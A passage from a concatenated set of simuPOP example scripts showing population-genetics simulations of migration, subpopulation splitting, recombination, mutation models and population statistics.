sim.Stat(alleleFreq=0),\n sim.PyEval(r'\"gen %d, #father %d, #mother %d\\n\"' \\\n ' % (gen, numFather, numMother)',\n stmts=\"numFather = len(set(pop.indInfo('father_idx')))\\n\"\n \"numMother = len(set(pop.indInfo('mother_idx')))\",\n exposePop='pop')\n ],\n gen=3\n)\n#end_file\n\n#begin_file log/InfoEval.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(20, loci=1, infoFields='a')\npop.setVirtualSplitter(sim.InfoSplitter('a', cutoff=[3]))\nsim.initGenotype(pop, freq=[0.2, 0.8])\npop.setIndInfo([random.randint(2, 5) for x in range(20)], 'a')\nsim.infoEval(pop, 'a', subPops=[(0, 0)]);print(' ')\nsim.infoEval(pop, 'ind.allele(0, 0)', exposeInd='ind');print(' ')\n# use sim.population variables\npop.dvars().b = 5\nsim.infoEval(pop, '\"%d \" % (a+b)');print(' ')\n#end_file\n\n#begin_file log/InfoExec.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=1, infoFields=['a', 'b', 'c'])\nsim.initSex(pop)\nsim.initGenotype(pop, freq=[0.2, 0.8])\nsim.infoExec(pop, 'a=1')\nprint(pop.indInfo('a')[:10])\nsim.infoExec(pop, 'b=ind.sex()', exposeInd='ind')\nprint(pop.indInfo('b')[:10])\nsim.infoExec(pop, 'c=a+b')\nprint(pop.indInfo('c')[:10])\npop.dvars().d = 5\nsim.infoExec(pop, 'c+=d')\nprint(pop.indInfo('c')[:10])\n# the operator can update population variable as well\nsim.infoExec(pop, 'd+=c*c')\nprint(pop.dvars().d)\n#end_file\n\n#begin_file log/outputByInterval.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport time\npop = sim.Population(1000, loci=10)\npop.dvars().init_time = time.time()\npop.dvars().last_time = time.time()\nexec('import time', pop.vars(), pop.vars())\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.IfElse('time.time() - last_time > 5', [\n sim.PyEval(r'\"Gen: %d\\n\" % gen'),\n sim.PyExec('last_time = time.time()')\n ]),\n sim.TerminateIf('time.time() - init_time > 20')\n ]\n)\n \n#end_file\n\n\n#begin_file log/migrateByProb.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000]*3, infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.Migrator(rate=[\n [0, 0.1, 0.1],\n [0, 0, 0.1],\n [0, 0.1, 0]\n ]), \n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval('subPopSize'),\n sim.PyOutput('\\n')\n ],\n gen = 5\n) \n#end_file\n\n#begin_file log/migrateByPropAndCount.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000]*3, infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.Migrator(rate=[[0.1], [0.2]],\n mode=sim.BY_PROPORTION,\n subPops=[1, 2],\n toSubPops=[3]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval('subPopSize'),\n sim.PyOutput('\\n')\n ],\n gen = 5\n) \n#\npop.evolve(\n preOps=sim.Migrator(rate=[[50, 50], [100, 50]],\n mode=sim.BY_COUNTS,\n subPops=[3, 2],\n toSubPops=[2, 1]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval('subPopSize'),\n sim.PyOutput('\\n')\n ],\n gen = 5\n) \n#end_file\n\n#begin_file log/migrateVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000]*2, infoFields='migrate_to')\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n # 500 males and 500 females\n initOps=sim.InitSex(sex=[sim.MALE, sim.FEMALE]),\n preOps=[\n sim.Migrator(rate=[\n [0, 0.10],\n [0, 0.05],\n ],\n mode = sim.BY_PROPORTION,\n subPops=[(0, 0), (0, 1)]),\n sim.Stat(popSize=True, numOfMales=True, vars='numOfMales_sp'),\n sim.PyEval(r\"'%d/%d\\t%d/%d\\n' % (subPop[0]['numOfMales'], subPopSize[0], \"\n \"subPop[1]['numOfMales'], subPopSize[1])\"),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True, numOfMales=True, vars='numOfMales_sp'),\n sim.PyEval(r\"'%d/%d\\t%d/%d\\n' % (subPop[0]['numOfMales'], subPopSize[0], \"\n \"subPop[1]['numOfMales'], subPopSize[1])\"),\n ],\n gen = 2\n) \n#end_file\n\n#begin_file log/manualMigration.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([10]*2, infoFields='migrate_to')\npop.setIndInfo([0, 1, 2, 3]*5, 'migrate_to')\nsim.migrate(pop, mode=sim.BY_IND_INFO)\npop.subPopSizes()\n#end_file\n\n#begin_file log/splitBySize.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000)\npop.evolve(\n preOps=[\n sim.SplitSubPops(subPops=0, sizes=[300, 300, 400], at=2),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(),\n gen = 4\n)\n#end_file\n\n#begin_file log/splitByProp.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef demo(gen, pop):\n if gen < 2:\n return 1000 + 100 * gen\n else:\n return [x + 50 * gen for x in pop.subPopSizes()]\n\npop = sim.Population(1000)\npop.evolve(\n preOps=[\n sim.SplitSubPops(subPops=0, proportions=[.5]*2, at=2),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(subPopSize=demo),\n gen = 4\n)\n#end_file\n\n\n\n#begin_file log/backwardMigrate.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsim.turnOnDebug('DBG_MIGRATOR')\npop = sim.Population(size=[10000, 5000, 8000], infoFields=['migrate_to', 'migrate_from'])\ndef originOfInds(pop):\n print('Observed backward migration matrix at generation {}'.format(pop.dvars().gen))\n for sp in range(pop.numSubPop()): \n # get source subpop for all individuals in subpopulation i\n origins = pop.indInfo('migrate_from', sp)\n spSize = pop.subPopSize(sp)\n B_sp = [origins.count(j) * 1.0 /spSize for j in range(pop.numSubPop())]\n print(' ' + ', '.join(['{:.3f}'.format(x) for x in B_sp]))\n return True\n\npop.evolve(\n initOps=sim.InitSex(),\n preOps=\n # mark the source subpopulation of each individual\n [sim.InitInfo(i, subPops=i, infoFields='migrate_from') for i in range(3)] + [\n # perform migration\n sim.BackwardMigrator(rate=[\n [0, 0.04, 0.02],\n [0.05, 0, 0.02],\n [0.02, 0.01, 0]\n ]),\n # calculate and print observed backward migration matrix \n sim.PyOperator(func=originOfInds),\n # calculate population size\n sim.Stat(popSize=True),\n # and print it\n sim.PyEval(r'\"Pop size after migration: {}\\n\".format(\", \".join([str(x) for x in subPopSize]))'),\n ], \n matingScheme=sim.RandomMating(),\n gen = 5\n) \n#end_file\n\n\n#begin_file log/splitByInfo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population([1000]*3, subPopNames=['a', 'b', 'c'], infoFields='x')\npop.setIndInfo([random.randint(0, 3) for x in range(1000)], 'x')\nprint(pop.subPopSizes())\nprint(pop.subPopNames())\nsim.splitSubPops(pop, subPops=[0, 2], infoFields=['x'])\nprint(pop.subPopSizes())\nprint(pop.subPopNames())\n#end_file\n\n#begin_file log/MergeSubPops.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([500]*2)\npop.evolve(\n preOps=[\n sim.MergeSubPops(subPops=[0, 1], at=3),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(),\n gen = 5\n)\n#end_file\n\n#begin_file log/ResizeSubPops.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([500]*2)\npop.evolve(\n preOps=[\n sim.ResizeSubPops(proportions=(1.5, 2), at=3),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(),\n gen = 5\n)\n#end_file\n\n\n#begin_file log/VaryingMigr.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\nfrom simuPOP.utils import migrIslandRates\nimport random\n\ndef demo(pop):\n # this function randomly split populations\n numSP = pop.numSubPop()\n if random.random() > 0.3:\n pop.splitSubPop(random.randint(0, numSP-1), [0.5, 0.5])\n return pop.subPopSizes()\n\ndef migr(pop):\n numSP = pop.numSubPop()\n sim.migrate(pop, migrIslandRates(0.01, numSP))\n return True\n\npop = sim.Population(10000, infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.PyOperator(func=migr),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomMating(subPopSize=demo),\n gen = 5\n)\n#end_file\n\n\n\n\n#begin_file log/recRate.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(size=[1000], loci=[100]),\n rep=2)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*100 + [1]*100)\n ],\n matingScheme=sim.RandomMating(ops = [\n sim.Recombinator(rates=0.01, reps=0),\n sim.Recombinator(rates=[0.01]*10, loci=range(50, 60), reps=1),\n ]),\n postOps=[\n sim.Stat(LD=[[40, 55], [60, 70]]),\n sim.PyEval(r'\"%d:\\t%.3f\\t%.3f\\t\" % (rep, LD_prime[40][55], LD_prime[60][70])'),\n sim.PyOutput('\\n', reps=-1)\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/recIntensity.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000], loci=3, lociPos=[0, 1, 1.1])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*3 + [1]*3)\n ],\n matingScheme=sim.RandomMating(ops=sim.Recombinator(intensity=0.01)),\n postOps=[\n sim.Stat(LD=[[0, 1], [1, 2]]),\n sim.PyEval(r'\"%.3f\\t%.3f\\n\" % (LD_prime[0][1], LD_prime[1][2])', step=10)\n ],\n gen = 50\n)\n#end_file\n\n#begin_file log/conversion.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(size=[1000], loci=[100]),\n rep=2)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*100 + [1]*100)\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.Recombinator(rates=0.01, loci=50, reps=0),\n sim.Recombinator(rates=0.01, loci=50, reps=1, convMode=(sim.NUM_MARKERS, 1, 10)),\n ]),\n postOps=[\n sim.Stat(LD=[[40, 55], [40, 70]]),\n sim.PyEval(r'\"%d:\\t%.3f\\t%.3f\\t\" % (rep, LD_prime[40][55], LD_prime[40][70])'),\n sim.PyOutput('\\n', reps=-1)\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/trackRec.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[1000, 2000], infoFields='ind_id')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n ],\n matingScheme=sim.RandomMating(ops = [\n sim.IdTagger(),\n sim.Recombinator(rates=0.001, output='>>rec.log', infoFields='ind_id')]),\n gen = 5\n)\nrec = open('rec.log')\n# print the first three lines of the log file\nprint(''.join(rec.readlines()[:4]))\n#begin_ignore\nrec.close()\nimport os\nos.remove('rec.log')\n#end_ignore\n#end_file\n\n#begin_file log/MatrixMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2, 0.3, 0.5])\n ],\n preOps=sim.MatrixMutator(rate = [\n [0, 1e-5, 1e-5],\n [1e-4, 0, 1e-4],\n [1e-3, 1e-3, 0]\n ]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0, step=100),\n sim.PyEval(r\"', '.join(['%.3f' % alleleFreq[0][x] for x in range(3)]) + '\\n'\",\n step=100),\n ],\n gen=1000\n)\n#end_file\n\n#begin_file log/KAlleleMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=1*3)\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.KAlleleMutator(k=5, rates=[1e-2, 1e-3], loci=[0, 1]),\n sim.Stat(alleleFreq=range(3), step=100),\n sim.PyEval(r\"', '.join(['%.3f' % alleleFreq[x][0] for x in range(3)]) + '\\n'\",\n step=100),\n ],\n gen=500\n)\n#end_file\n\n#begin_file log/SNPMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=[1, 1], lociNames=['A', 'B'],\n infoFields='fitness')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.SNPMutator(u=0.001),\n sim.MaSelector(loci='A', fitness=[1, 0.99, 0.98]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=['A', 'B'], step=100),\n sim.PyEval(r\"'%.3f\\t%.3f\\n' % (alleleFreq[0][1], alleleFreq[1][1])\",\n step=100),\n ],\n gen=500\n)\n#end_file\n\n#begin_file log/AcgtMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=1,\n alleleNames=['A', 'C', 'G', 'T'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.1, .1, .1, .7])\n ],\n matingScheme=sim.RandomMating(),\n preOps=[\n sim.AcgtMutator(rate=[1e-4, 0.5], model='K80'),\n sim.Stat(alleleFreq=0, step=100),\n sim.PyEval(r\"', '.join(['%.3f' % alleleFreq[0][x] for x in range(4)]) + '\\n'\",\n step=100),\n ],\n gen=500\n)\n#end_file\n\n#begin_file log/StepwiseMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=[1, 1])\npop.evolve(\n # all start from allele 50\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq= [0]*50 + [1])\n ],\n matingScheme=sim.RandomMating(),\n preOps=[\n sim.StepwiseMutator(rates=1e-3, loci=0),\n sim.StepwiseMutator(rates=1e-3, incProb=0.6, loci=1,\n mutStep=(sim.GEOMETRIC_DISTRIBUTION, 0.2)),\n ],\n gen=100\n)\n# count the average number tandem repeats at both loci\ncnt0 = cnt1 = 0\nfor ind in pop.individuals():\n cnt0 += ind.allele(0, 0) + ind.allele(0, 1)\n cnt1 += ind.allele(1, 0) + ind.allele(1, 1)\n\nprint('Average number of repeats at two loci are %.2f and %.2f.' % \\\n (cnt0/2000., cnt1/2000.))\n#end_file\n\n#begin_file log/PyMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\ndef incAllele(allele):\n return allele + random.randint(1, 5)\n\npop = sim.Population(size=1000, loci=[20])\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(),\n postOps=sim.PyMutator(func=incAllele, rates=[1e-4, 1e-3],\n loci=[2, 10]),\n gen = 1000\n)\n# count the average number tandem repeats at both loci\ndef avgAllele(pop, loc):\n ret = 0\n for ind in pop.individuals():\n ret += ind.allele(loc, 0) + ind.allele(loc, 1)\n return ret / (pop.popSize() * 2.)\n\nprint('Average number of repeats at two loci are %.2f and %.2f.' % \\\n (avgAllele(pop, 2), avgAllele(pop, 10)))\n#end_file\n\n#begin_file log/MixedMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5000, loci=[1, 1])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[50, 50])\n ],\n preOps=[\n # the first locus uses a pure stepwise mutation model\n sim.StepwiseMutator(rates=0.001, loci=0),\n # the second locus uses a mixed model\n sim.MixedMutator(rates=0.001, loci=1, mutators=[ \n sim.KAlleleMutator(rates=1, k=100),\n sim.StepwiseMutator(rates=1)\n ], prob=[0.1, 0.9])],\n matingScheme=sim.RandomMating(),\n gen = 20\n)\n# what alleles are there?\ngeno0 = []\ngeno1 = []\nfor ind in pop.individuals():\n geno0.extend([ind.allele(0, 0), ind.allele(0, 1)])\n geno1.extend([ind.allele(1, 0), ind.allele(1, 1)])\n\nprint('Locus 0 has alleles', ', '.join([str(x) for x in set(geno0)]))\nprint('Locus 1 has alleles', ', '.join([str(x) for x in set(geno1)]))\n#end_file\n\n#begin_file log/ContextMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5000, loci=[3, 3])\npop.evolve(\n # initialize locus by 0, 0, 0, 1, 0, 1\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 1], loci=[3, 5])\n ],\n preOps=[\n sim.ContextMutator(mutators=[\n sim.SNPMutator(u=0.1),\n sim.SNPMutator(u=1),\n ],\n contexts=[(0, 0), (1, 1)],\n loci=[1, 4],\n rates=0.01\n ),\n sim.Stat(alleleFreq=[1, 4], step=5),\n sim.PyEval(r\"'Gen: %2d freq1: %.3f, freq2: %.3f\\n'\" + \n \" % (gen, alleleFreq[1][1], alleleFreq[4][1])\", step=5)\n ], \n matingScheme=sim.RandomMating(),\n gen = 20\n)\n#end_file\n\n#begin_file log/pyContextMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(5000, loci=[3, 3])\ndef contextMut(allele, context):\n if context == [0, 0]:\n if allele == 0 and random.random() < 0.1:\n return 1\n elif context == [1, 1]:\n if allele == 0:\n return 1\n # do not mutate\n return allele\n\npop.evolve(\n # initialize locus by 0, 0, 0, 1, 0, 1\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 1], loci=[3, 5])\n ],\n preOps=[\n sim.PyMutator(func=contextMut, context=1,\n loci=[1, 4], rates=0.01\n ),\n #sim.SNPMutator(u=0.01, v= 0.01, loci=[1, 4]),\n sim.Stat(alleleFreq=[1, 4], step=5),\n sim.PyEval(r\"'Gen: %2d freq1: %.3f, freq2: %.3f\\n'\" + \n \" % (gen, alleleFreq[1][1], alleleFreq[4][1])\", step=5)\n ], \n matingScheme=sim.RandomMating(),\n gen = 20\n)\n#end_file\n\n#begin_file log/PointMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=1, infoFields='fitness')\npop.evolve(\n initOps=sim.PyOutput('Introducing alleles at generation'),\n preOps=sim.MaSelector(loci=0, wildtype=0, fitness=[1, 1.05, 1.1]),\n matingScheme=sim.RandomSelection(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.IfElse('alleleNum[0][1] == 0', ifOps=[\n sim.PyEval(r\"' %d' % gen\"),\n sim.PointMutator(inds=0, loci=0, allele=1),\n ]),\n sim.IfElse('alleleFreq[0][1] > 0.05', ifOps=[\n sim.PyEval(r\"'.\\nTerminate at generation %d at allele freq %.3f.\\n'\" +\n \" % (gen, alleleFreq[0][1])\"),\n sim.TerminateIf('True'),\n ])\n ],\n)\n#end_file\n\n#begin_file log/mutatorVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef fragileX(geno):\n '''A disease model where an individual has increased risk of \n affected if the number of tandem repeats exceed 75.\n '''\n # Alleles A1, A2.\n maxRep = max(geno)\n if maxRep < 50:\n return 0\n else:\n # individuals with allele >= 70 will surely be affected\n return min(1, (maxRep - 50)*0.05)\n\ndef avgAllele(pop):\n 'Get average allele by affection sim.status.'\n sim.stat(pop, alleleFreq=(0,1), subPops=[(0,0), (0,1)],\n numOfAffected=True, vars=['alleleNum', 'alleleNum_sp'])\n avg = []\n for alleleNum in [\\\n pop.dvars((0,0)).alleleNum[0], # first locus, unaffected\n pop.dvars((0,1)).alleleNum[0], # first locus, affected\n pop.dvars().alleleNum[1], # second locus, overall\n ]:\n alleleSum = numAllele = 0\n for idx,cnt in enumerate(alleleNum):\n alleleSum += idx * cnt\n numAllele += cnt\n if numAllele == 0:\n avg.append(0)\n else:\n avg.append(alleleSum * 1.0 /numAllele)\n # unaffected, affected, loc2\n pop.dvars().avgAllele = avg\n return True\n\npop = sim.Population(10000, loci=[1, 1])\npop.setVirtualSplitter(sim.AffectionSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[50, 50])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n # determine affection sim.status for each offspring (duringMating)\n sim.PyPenetrance(func=fragileX, loci=0),\n # unaffected offspring, mutation rate is high to save some time\n sim.StepwiseMutator(rates=1e-3, loci=1),\n # unaffected offspring, mutation rate is high to save some time\n sim.StepwiseMutator(rates=1e-3, loci=0, subPops=[(0, 0)]),\n # affected offspring have high probability of mutating upward\n sim.StepwiseMutator(rates=1e-2, loci=0, subPops=[(0, 1)],\n incProb=0.7, mutStep=3),\n # number of affected\n sim.PyOperator(func=avgAllele, step=20),\n sim.PyEval(r\"'Gen: %3d #Aff: %d AvgRepeat: %.2f (unaff), %.2f (aff), %.2f (unrelated)\\n'\"\n + \" % (gen, numOfAffected, avgAllele[0], avgAllele[1], avgAllele[2])\",\n step=20),\n ],\n gen = 101\n)\n#end_file\n\n#begin_file log/alleleMapping.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0]*4 + [0.1, 0.2, 0.3, 0.4])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.KAlleleMutator(k=4, rates=1e-4, mapIn=[0]*4 + list(range(4)),\n mapOut=[4, 5, 6, 7]),\n sim.Stat(alleleFreq=0, step=100),\n sim.PyEval(r\"', '.join(['%.2f' % alleleFreq[0][x] for x in range(8)]) + '\\n'\",\n step=100),\n ],\n gen=500\n)\n#end_file\n\n#begin_file log/infiniteSites.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='long')\n#begin_ignore\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\ndef infSitesMutate(pop, param):\n '''Apply an infinite mutation model'''\n (startPos, endPos, rate) = param\n # for each individual\n for ind in pop.individuals():\n # for each homologous copy of chromosomes\n for p in range(2):\n # using a geometric distribution to determine\n # the first mutation location\n loc = sim.getRNG().randGeometric(rate)\n # if a mutation happens, record the mutated location\n if startPos + loc < endPos:\n try:\n # find the first non-zero location\n idx = ind.genotype(p).index(0)\n # record mutation here\n ind.setAllele(startPos + loc, idx, ploidy=p)\n except:\n raise\n print('Warning: more than %d mutations have accumulated' % pop.totNumLoci())\n pass\n return True\n\npop = sim.Population(size=[2000], loci=[100])\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n # mutate in a 10Mb region at rate 1e-8\n sim.PyOperator(func=infSitesMutate, param=(1, 10000000, 1e-8)),\n ],\n matingScheme=sim.RandomMating(),\n gen = 100\n)\n# now, we get a sim.Population. Let us have a look at the 'alleles'.\n# print the first five mutation locations\nprint(pop.individual(0).genotype()[:5])\n# how many alleles are there (does not count 0)?\nprint(len(set(pop.genotype())) - 1)\n# Allele count a simple count of alleles.\ncnt = {}\nfor allele in pop.genotype():\n if allele == 0:\n continue\n if allele in cnt:\n cnt[allele] += 1\n else:\n cnt[allele] = 1\n\n# highest allele frequency?\nprint(max(cnt.values()) *0.5 / pop.popSize())\n#end_file\n\n\n#begin_file log/countMutants.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom collections import defaultdict\n# count number of mutants at each locus\ncounter = defaultdict(int)\ndef countMutants(mutants):\n global counter\n for line in mutants.split('\\n'):\n # a trailing \\n will lead to an empty string\n if not line: \n continue\n (gen, loc, ploidy, a1, a2, id) = line.split('\\t')\n counter[int(loc)] += 1\n\npop = sim.Population([5000]*3, loci=[2,1,1], infoFields='ind_id',\n chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.IdTagger(),\n ],\n preOps=[\n sim.KAlleleMutator(rates=[0.001] + [0.01]*3,\n loci=range(4), k=100, output=countMutants),\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.IdTagger(),\n sim.MendelianGenoTransmitter()\n ]),\n gen = 10\n)\nprint(counter.items())\n#end_file\n\n\n\n#begin_file log/statSuffix.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([5000]*3, loci=5)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(structure=range(5), subPops=(0, 1), suffix='_01', step=40),\n sim.Stat(structure=range(5), subPops=(1, 2), suffix='_12', step=40),\n sim.Stat(structure=range(5), subPops=(0, 2), suffix='_02', step=40),\n sim.Stat(structure=range(5), step=40),\n sim.PyEval(r\"'Fst=%.3f (pairwise: %.3f %.3f %.3f)\\n' % (F_st, F_st_01, F_st_12, F_st_02)\",\n step=40),\n ],\n gen = 200\n)\n#end_file\n\n#begin_file log/statCount.py\n#begin_ignore\nimport 